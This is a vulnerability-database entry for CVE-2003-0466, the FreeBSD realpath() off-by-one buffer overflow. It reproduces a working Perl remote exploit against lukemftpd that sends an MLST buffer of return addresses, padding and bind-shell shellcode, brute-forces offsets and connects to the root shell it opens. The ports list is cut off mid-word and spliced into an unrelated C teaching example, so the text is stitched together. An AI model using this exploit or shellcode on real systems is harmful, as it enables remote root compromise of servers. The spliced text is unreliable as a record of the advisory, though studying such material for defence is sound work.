Multiple Vendor C Library realpath() Single-Byte (Off-by-One) Buffer Overflow Vulnerability

Vulnerability ID: 1107434    Vulnerability type: Boundary condition error
Published: 2003-07-31    Updated: 2007-05-15
CVE ID: CVE-2003-0466    CNNVD ID: CNNVD-200308-136
Platform: FreeBSD    CVSS score: 10.0
|Source
https://www.exploit-db.com/exploits/22976
https://www.securityfocus.com/bid/8315
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-136
|Details
The realpath(3) function determines the canonical absolute pathname of a given pathname, which may contain "/" characters, components such as "/./" or "/../", and symbolic links. realpath(3) is part of the FreeBSD standard C library. When it computes the length of the resolved pathname, realpath(3) has a single-byte (off-by-one) overflow. A local or remote attacker can use this flaw to mount a buffer overflow attack against a service that calls the function and execute arbitrary instructions on the system with the privileges of that process. If the resolved pathname is 1024 bytes long and contains two directory separators, the buffer passed to realpath(3) can be overwritten by a single NUL byte. In general, applications that use realpath(3) may be subject to denial of service, arbitrary code execution, or privilege escalation. On FreeBSD, several applications use realpath(3). For example: lukemftpd(8), a variant FTP server, uses realpath(3) when handling the MLST and MLSD commands; the vulnerability can be exploited to execute arbitrary code with superuser privileges. sftp-server(8), part of OpenSSH, uses realpath(3) when handling the chdir command; the vulnerability can be exploited to execute arbitrary code with the privileges of the authenticated user. In FreeBSD 4.8-RELEASE, the FreeBSD Ports Collection contains the following applications that use realpath(3); they have not been audited for whether the vulnerability is present or exploitable:
BitchX-1.0c19_1, Mowitz-0.2.1_1, XFree86-clients-4.3.0_1, abcache-0.14, aim-1.5.234, analog-5.24,1, anjuta-1.0.1_1, aolserver-3.4.2, argus-2.0.5, arm-rtems-gdb-5.2_1, avr-gdb-5.2.1, ccache-2.1.1, cdparanoia-3.9.8_4, cfengine-1.6.3_4, cfengine2-2.0.3, cmake-1.4.7, comserv-1.4.3, criticalmass-0.97, dedit-0.6.2.3_1, drweb_postfix-4.29.10a, drweb-4.29.2, drweb_sendmail-4.29.10a, edonkey-gui-gtk-0.5.0, enca-0.10.7, epic4-1.0.1_2, evolution-1.2.2_1, exim-3.36_1, exim-4.12_5, exim
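To make the bug class concrete, the following is an added example and not FreeBSD's libc code or anything from this advisory: a deliberately simplified path resolver whose length check, in its buggy form, counts the characters of the resolved path but not the terminating NUL, so a result that exactly fills the buffer writes one NUL byte past it, shown beside the corrected check. The buffer is shrunk to 16 bytes in place of MAXPATHLEN and followed by a canary byte so the overrun is observable; the names resolved_buf, append_component and resolve are chosen here, and ".." and symbolic links are not handled.

```c
#include <string.h>

#define RES_MAX 16   /* stand-in for MAXPATHLEN (1024); small so the cases stay readable */
#define CANARY 0x5A

/* The resolver is told its buffer is RES_MAX bytes; storage[RES_MAX] is a canary,
 * so a one-byte overrun is observable without undefined behaviour. */
struct resolved_buf {
    char storage[RES_MAX + 1];
};

/* Append one component to out (declared size outsz), adding '/' unless out ends in one.
 * Simplified model of a realpath(3)-style length check, not libc code.  With
 * off_by_one != 0 the check counts the characters but not the terminating NUL (the
 * bug class on this page): a result of exactly outsz characters passes and the NUL
 * lands one byte past the buffer.  Returns 0 on success, -1 if it does not fit. */
static int append_component(char *out, size_t outsz, const char *comp, int off_by_one)
{
    size_t len = strlen(out);
    size_t sep = (len > 0 && out[len - 1] != '/') ? 1 : 0;
    size_t need = len + sep + strlen(comp);          /* characters, excluding NUL */
    size_t limit = off_by_one ? outsz : outsz - 1;   /* corrected: leave room for NUL */
    if (need > limit)
        return -1;
    if (sep)
        out[len++] = '/';
    while (*comp)
        out[len++] = *comp++;
    out[len] = '\0';                                 /* index outsz in the buggy case */
    return 0;
}

/* Resolve an absolute path, dropping "." and empty components.  No ".." or symlink
 * handling; only the length accounting matters here.  0 on success, -1 on overflow. */
static int resolve(struct resolved_buf *buf, const char *path, int off_by_one)
{
    char copy[128], *tok;
    buf->storage[RES_MAX] = CANARY;
    strcpy(buf->storage, "/");
    strncpy(copy, path, sizeof copy - 1);
    copy[sizeof copy - 1] = '\0';
    for (tok = strtok(copy, "/"); tok != NULL; tok = strtok(NULL, "/")) {
        if (strcmp(tok, ".") == 0)
            continue;
        if (append_component(buf->storage, RES_MAX, tok, off_by_one) < 0)
            return -1;
    }
    return 0;
}
```

After resolve() returns, storage[RES_MAX] still equals CANARY with the corrected check, while the buggy check accepts a 16-character result and leaves a NUL there.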
|Exploit
source: http://www.securityfocus.com/bid/8315/info
  
The 'realpath()' function is a C-library procedure to resolve the canonical, absolute pathname of a file based on a path that may contain values such as '/', './', '../', or symbolic links. A vulnerability that was reported to affect the implementation of 'realpath()' in WU-FTPD has led to the discovery that at least one implementation of the C library is also vulnerable. FreeBSD has announced that the off-by-one stack buffer-overflow vulnerability is present in their libc. Other systems are also likely vulnerable.
  
Reportedly, this vulnerability has been successfully exploited against WU-FTPD to execute arbitrary instructions.
  
NOTE: Patching the C library alone may not remove all instances of this vulnerability. Statically linked programs may need to be rebuilt with a patched version of the C library. Also, some applications may implement their own version of 'realpath()'. These applications would require their own patches. FreeBSD has published a large list of applications that use 'realpath()'. Administrators of FreeBSD and other systems are urged to review it. For more information, see the advisory 'FreeBSD-SA-03:08.realpath'.

#!/usr/bin/perl

#realpath lukemftpd remote exploit for freeBSD 4.8
#i managed to code this, and lose the first copy, hence a re-write :(
#deadbeat,
#left without any return addresses/offsets purposely to stop kids using it..
#want the rets/offsets? heh..
#
#tested on freeBSD 4.8 and it worked ;) it worked ;)
#e: daniels@legend.co.uk
#e: deadbeat@sdf.lonestar.org

use IO::Socket;

$user = $ARGV[0];
$pass = $ARGV[1];
$ret = $ARGV[2];
$offset = $ARGV[3];
$host = $ARGV[4];
$buf= 1024;          # MAXPATHLEN on FreeBSD: size of the buffer realpath(3) fills
$n = "./";           # "./" components are stripped by realpath(3), so they only pad the length
print "lukemftpd remote for FreeBSD 4.8 ..\n";
print "this is the kiddiot version, go grab them ret's+offsets..lool\n";
print "contact me and i might give u the rets/offsets\n";
if(!$ARGV[4]){
	die "Usage: perl $0 <user> <pass> <ret> <offset> <host>\n";
}
# accept the return address as hex ("0x...") as well as decimal
$ret = hex($ret) if $ret =~ /^0x/i;

sub brute_force
{
	my $r = $_[0];
	my $o = $_[1];
	my $buffer = "";   # start from an empty buffer on every attempt

		#shellcode from zillion.. from safemode.org...binds /bin/sh on 41254
	$hell =	"\xeb\x64\x5e\x31\xc0\x88\x46\x07\x6a\x06\x6a\x01\x6a\x02\xb0".
        		"\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6\x46\x09\x02\x66\xc7\x46".
        		"\x0a\xa1\x26\x89\x46\x0c\x6a\x10\x8d\x46\x08\x50\x52\x31\xc0".
        		"\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd\x80".
        		"\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff\xff".
        		"\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\x80\xe9\x01".
        		"\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\x97\xff".
        		"\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23";

	# candidate return address, repeated to fill $buf bytes
	$addr = pack('l', ($r+$o));
	for($i=0;$i <$buf; $i +=4){
		$buffer .=$addr;
	}
	# "./" padding, then the shellcode
	for($i=0;$i<$buf - length($hell) /2;$i++){
		$buffer .=$n;
	}
	$buffer .=$hell;

	print "Connecting to: $host\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"21",
		PeerAddr=>"$host"
	)or die "cant connect to $host ...maybe try a real host ;)\n";
	sleep 1;
	print ("[+]Trying addr: 0x", sprintf('%lx', ($r + $o)),"\n");
	print $sox "user $user\r\n";
	sleep 1;
	print $sox "pass $pass\r\n";   # send to the server, not to stdout
	sleep 1;
	print $sox "MLST $buffer\r\n"; # MLST is the command lukemftpd passes through realpath(3)
	sleep 2;
	close $sox;
	print "Trying to connect to r00tshell\n";
	$sox = IO::Socket::INET->new(
		Proto=>"tcp",
		PeerPort=>"41254",
		PeerAddr=>"$host"
	)or die"No r00tshell this time, try using a proper offset/ret_addr..\n";
	print "Wicked we got a r00tshell on $host : 41254\n\n";
	close $sox;
}

# step the offset and retry; brute_force() packs the address itself
for($a=0;$a<1000;$a++){
	$offset++;
	print "Brute Force [$a]\n";
	brute_force($ret,$offset);
}
|Affected products
Washington University wu-ftpd 2.6.2 + Compaq Tru64 5.1 b PK2 (BL22) + Compaq Tru64 5.1 b PK1 (BL1) + Compaq Tru64 5.1
|References

Source: US-CERT Vulnerability Note: VU#743092
Name: VU#743092
Link: http://www.kb.cert.org/vuls/id/743092
Source: BID
Name: 8315
Link: http://www.securityfocus.com/bid/8315
Source: XF
Name: libc-realpath-offbyone-bo(12785)
Link: http://xforce.iss.net/xforce/xfdb/12785
Source: TURBO
Name: TLSA-2003-46
Link: http://www.turbolinux.com/security/TLSA-2003-46.txt
Source: BUGTRAQ
Name: 20060214 Re: Latest wu-ftpd exploit :-s
Link: http://www.securityfocus.com/archive/1/425061/100/0/threaded
Source: BUGTRAQ
Name: 20060213 Latest wu-ftpd exploit :-s
Link: http://www.securityfocus.com/archive/1/424852/100/0/threaded
Source: REDHAT
Name: RHSA-2003:246
Link: http://www.redhat.com/support/errata/RHSA-2003-246.html
Source: REDHAT
Name: RHSA-2003:245
Link: http://www.redhat.com/support/errata/RHSA-2003-245.html
Source: OSVDB
Name: 6602
Link: http://www.osvdb.org/6602
Source: SUSE
Name: SuSE-SA:2003:032
Link: http://www.novell.com/linux/security/advisories/2003_032_wuftpd.html
Source: DEBIAN
Name: DSA-357
Link: http://www.debian.org/security/2003/dsa-357
Source: SUNALERT
Name: 1001257
Link: http://sunsolve.sun.com/search/document.do?assetkey